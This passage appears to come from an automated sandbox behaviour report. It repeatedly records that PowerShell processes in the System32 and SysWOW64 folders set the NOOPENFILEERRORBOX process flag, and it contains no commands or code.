                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
